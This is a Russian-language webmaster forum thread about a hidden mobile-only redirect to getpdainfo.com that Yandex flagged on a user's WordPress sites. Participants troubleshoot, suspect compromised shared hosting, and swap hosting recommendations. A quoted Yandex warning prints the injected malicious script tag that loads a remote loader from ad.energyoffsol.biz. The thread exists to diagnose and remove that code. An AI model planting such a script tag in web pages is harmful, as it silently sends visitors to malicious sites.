Мобильный редирект на сайтах, getpdainfo.com.

1
На сайте с 22.09.2013
Offline
12
10k
6299

На всех сайтах мобильный редирект, Яндекс прислал следующее письмо:

"При последней проверке Вашего сайта наши алгоритмы обнаружили код, автоматически перенаправляющий посетителей на следующий вредоносный ресурс: getpdainfo.com при посещении сайта с мобильных устройств.

Рекомендуем проверить файл .htaccess и .php файлы Вашего сервера и удалить следующий вредоносный код:

<script src="//ad.energyoffsol.biz/ldr.php?912076016"></script>"

htaccess посмотрел, девственно чистый, права 444, php-файлы все шуршал всю ночь - нет там ничего подобного. Проверил все файлы сайта, выполнил поиск по тексту "energy" и "getpda", ничего не найдено, а у сайтов поменьше даже сидел изучал SQL БД вручную, вдруг туда приписали где - пролистал все, ничего не нашел.

Что я сделал дальше:

1) Удалил все файлы сайтов.

2) Сменил пароль к ФТП.

3) Отформатировал жесткие диски.

4) Переустановил Windows 7, лицензионный, с официального диска.

5) Сменил повторно пароль к ФТП, а также сменил пароль у пользователя БД.

6) Поставил чистые дистрибутивы Wordpress с официального сайта, прицепил к ним скопированные БД.

7) Получил предупреждение от Яндекс Вебмастера вновь и чуть не повесился.

Пару человек, которые шарят в безопасности, проверили мои сайты и БД тоже, но ничего не нашли, сказали, что проблема в хостинге. Но это же бред? Либо вирусняк где-то в БД валяется (хотя я руками проверял всю БД листал-читал в ноутпаде, ничего не нашел)?

Как можно найти эту дрянь? И главное - как спалить этот редирект? Захожу с разных мобильных устройств, никакого редиректа не наблюдаю, хоть напрямую, хоть через поисковики. Ставил плагин для FF, прописывал user-agent: Opera/9.80 (Android; Opera Mini/7.0.29952/28.1857; U; ru) Presto/2.8.119 Version/11.10 - тоже не происходит редиректа.

Помогите пожалуйста, я скоро блевану уже от красного значка в панели Яндекс веб-мастера и регулярных сообщений - то "Вредоносный код отсутствует", то он снова "Обнаружен", Яндекс то видит его, то нет!

Вот например из ЯВМ:

Страница:

http://uptodatetruth.com/pikovaya-dama-legenda/

Вердикт:

mobile_redirect

K5
На сайте с 21.07.2010
Offline
209
#1

для начала пациентов покажите...

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
1
На сайте с 22.09.2013
Offline
12
10k
#2

Вот например из ЯВМ:

Страница:

http://uptodatetruth.com/pikovaya-dama-legenda/

Вердикт:

mobile_redirect

😕

Y
На сайте с 07.10.2012
Offline
90
#3

У меня такая же хрень, ни че не могу найти, щас ai-bolit-ом проверяю

1
На сайте с 22.09.2013
Offline
12
10k
#4
yakes:
У меня такая же хрень, ни че не могу найти, щас ai-bolit-ом проверяю

Ни ai-bolit, ни другая подобная софтина, ничего не выявили.

asknik
На сайте с 27.05.2011
Offline
69
#5
10k:

Пару человек, которые шарят в безопасности, проверили мои сайты и БД тоже, но ничего не нашли, сказали, что проблема в хостинге. Но это же бред?
mobile_redirect

Почему это бред? Поищи в этой ветке форума, и поймешь тогда что вполне реально. У меня было такое, тоже искал, а потом проверил на редирект соседние сайты(на том же ip) и понял что проблема не у меня. Все изложил хостеру и он проблему решил

Кстати редирект был хитрый, отправлял как то то ли рандомно то ли по какому то алгоритму. Поэтому яша то ставил метку, то снимал метку с сайта потом опять ставил.

Наши девки лучше всех!
1
На сайте с 22.09.2013
Offline
12
10k
#6
asknik:
Почему это бред? Поищи в этой ветке форума, и поймешь тогда что вполне реально. У меня было такое, тоже искал, а потом проверил на редирект соседние сайты(на том же ip) и понял что проблема не у меня. Все изложил хостеру и он проблему решил

Я изложил проблему хостеру, они сказали, что проверят, и предложили перейти на VPS. Я пока еще не хочу на VPS, меня обычный хостинг устраивает. Пробовать переходить к другим, у кого эта проблема была решена? Reg, Timeweb? У тебя какой хостинг? Дай рефку.

asknik
На сайте с 27.05.2011
Offline
69
#7
10k:
Я изложил проблему хостеру, они сказали, что проверят, и предложили перейти на VPS.

Я им доказательства предоставлял типа вот 15 сайтов, если на каждый с мобилы зайти с 6 штук идет редирект, повторно с того же ip могло не редиректить. Написал тебе в личку

1
На сайте с 22.09.2013
Offline
12
10k
#8

Так что, кто-нибудь из гуру ответит? :(

Хостинг менять, или это дело в сайтах все-таки где-то? 😕

W
На сайте с 24.11.2007
Offline
209
#9

Попробуй сменить хостинг - что бы исключить этот вариант

1
На сайте с 22.09.2013
Offline
12
10k
#10
webistin:
Попробуй сменить хостинг - что бы исключить этот вариант

Подкиньте хостинг адекватный, который решил эту проблему, пожалуйста, или не имеет ее, так как взломали большинство походу - в ihc.ru хотел податься на нем остановился по ветке серча и рейтингам, но погуглил и увидел что там у юзеров тоже редирект на getpdainfo.

TimeWeb и Reg.Ru решили эту проблему вроде как, но timeweb не очень же, по аптайму? Reg.Ru нормальный? Уже устал листать хостеров и искать отзывы и думать заказные они или нет.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий